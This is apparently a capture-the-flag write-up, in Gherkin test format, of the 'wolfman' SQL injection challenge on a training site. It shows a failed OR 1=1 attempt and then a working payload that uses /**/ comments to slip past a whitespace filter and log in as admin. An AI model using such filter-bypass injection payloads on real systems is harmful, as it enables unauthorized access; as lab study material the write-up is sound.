## Version 2.0
## language: en

Feature: wolfman-sql-injection-lordofsqli
  Site:
    https://los.rubiya.kr/gate.php
  Category:
    SQL Injection
  User:
    john2104
  Goal:
    Login as admin

  Background:
  Hacker's software:
  | <Software name> | <Version>           |
  | NixOS           | 19.09.2260          |
  | Chromium        | 78.0.3904.87        |

  Machine information:
    Given the challenge URL
    """
    https://los.rubiya.kr/chall/wolfman_4fdc56b75971e41981e3d1e2fbe9b7f7.php
    """
    When I open the url with Chrome
    Then I see the PHP code that validates the password
    And It shows the query made on the screen
    """
    select id from prob_wolfman where id='guest' and pw=''
    """

  Scenario: Fail:Sql-injection
    Given the PHP code
    And knowing that answer is correct when It returns:
    """
    "<h2>Hello admin</h2>";
    """
    When I try with the well known payload:
    """
    pw=' OR 1 = 1
    """
    Then I get "No whitespace ~_~"

   Scenario: Success:Sqli-comment-technique
    Given I inspect the code one more time
    And I see that they validate the whitespaces
    """
    if(preg_match('/ /i', $_GET[pw])) exit("No whitespace ~_~");
    """
    When I use a comment to bypass the control
    """
    ?pw=1'/**/or/**/'1'='1
    """
    And I get the message "Hello guest"
    Then I modified the payoad fot the following
    """
    ?pw=1'/**/or/**/id='admin
    """
    And I solve the challenge
